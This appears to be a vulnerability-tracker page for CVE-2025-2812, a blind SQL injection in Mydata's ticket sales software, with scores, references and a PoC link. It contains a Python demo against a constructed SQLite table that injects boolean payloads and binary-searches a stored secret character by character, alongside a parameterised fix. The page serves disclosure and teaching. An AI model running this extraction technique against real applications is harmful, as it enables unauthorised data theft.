CVE-2025-2812

CRITICAL

Mydata Ticket Sales Automation < 2025-04-03 - Blind SQL Injection

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-2812. PoCs published by sahici.

AI-analyzed exploit summary: This repository provides a detailed proof-of-concept for CVE-2025-2812, a Boolean-based Blind SQL Injection vulnerability in 'Bilet Satış Otomasyonu' (Ticket Sales Automation) by Mydata Bilişim Ltd. Şti. The exploit targets the 'ilkHarf' ("first letter") parameter in the password reset functionality, allowing unauthorized data extraction.

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mydata Informatics Ticket Sales Automation allows Blind SQL Injection. This issue affects Ticket Sales Automation versions before 03.04.2025 (DD.MM.YYYY).
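What "Boolean-based blind" means in practice for a parameter like 'ilkHarf', as an added example that is not the sahici PoC and not Mydata's code: the application's real query is not on this page, so the table, the row values and the "first letter" LIKE lookup below are constructed for illustration. The vulnerable function concatenates the parameter into the SQL text; the hardened function binds it. The extractor never sees query output, only whether any rows came back, and recovers a column value by binary search on its length and then on each character's code point, which is the general form of the technique rather than the specific payloads in the PoC.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the application's database (not Mydata's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (username, secret) VALUES (?, ?)",
        [("admin", "s3cr3t"), ("ayse", "pw1"), ("berk", "pw2")],
    )
    return conn


def lookup_vulnerable(conn, ilk_harf):
    """Hypothetical vulnerable form: the 'first letter' value is spliced into the SQL text."""
    sql = "SELECT username FROM users WHERE username LIKE '" + ilk_harf + "%'"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, ilk_harf):
    """Hardened form: the value is a bound parameter, and LIKE metacharacters in it are escaped."""
    pattern = ilk_harf.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_") + "%"
    sql = "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (pattern,))]


QUERY_COUNT = {"n": 0}  # number of requests the blind extraction needed


def oracle(conn, lookup, condition):
    """True iff the injected condition holds: '%' matches every row, so rows come back only then."""
    QUERY_COUNT["n"] += 1
    payload = "%' AND (" + condition + ") -- "
    return len(lookup(conn, payload)) > 0


def blind_int(conn, lookup, expr, lo, hi):
    """Binary-search the value of an integer SQL expression in [lo, hi] using only yes/no answers."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, lookup, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(conn, lookup, target_user="admin"):
    """Recover one column value of one row: its length first, then each character's code point."""
    QUERY_COUNT["n"] = 0
    sub = f"(SELECT secret FROM users WHERE username = '{target_user}')"
    length = blind_int(conn, lookup, f"length({sub})", 0, 64)
    codes = [blind_int(conn, lookup, f"unicode(substr({sub}, {pos}, 1))", 32, 126)
             for pos in range(1, length + 1)]
    return "".join(chr(c) for c in codes)


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "a"))                                # normal use
    print(extract_secret(db, lookup_vulnerable), QUERY_COUNT["n"])   # secret leaks
    print(extract_secret(db, lookup_fixed), QUERY_COUNT["n"])        # nothing leaks
```

Against the bound-parameter version the same payload is just a string that no username starts with, so every oracle answer is "no", the length search bottoms out at 0 and nothing is recovered. The query count shows why the SSVC entry marks this as automatable: each character costs about seven requests, with no error message or data needed in the response.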

Exploits (1)

nomisec WORKING POC
by sahici · poc
https://github.com/sahici/CVE-2025-2812


Classification
Working Poc 95%
Attack Type
SQLi
Complexity
Moderate
Reliability
Reliable
Target: Bilet Satış Otomasyonu by Mydata Bilişim Ltd. Şti
No auth needed
Prerequisites: Access to the vulnerable endpoint · Basic knowledge of SQL injection techniques
Analyzed by devstral-2 on Feb 16, 2026

References (3)

Third Party Advisory (government resource; link currently broken): https://www.usom.gov.tr/bildirim/tr-25-0099

Scores

CVSS v3 9.8
EPSS 0.0039
EPSS Percentile 30.6%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact total

Details

CWE
CWE-89
Status published
Products (2)
mydata/ticket_sales_automation < 2025-04-03
Mydata Informatics/Ticket Sales Automation < 03.04.2025 (DD.MM.YYYY)
Published May 02, 2025
Tracked Since Feb 18, 2026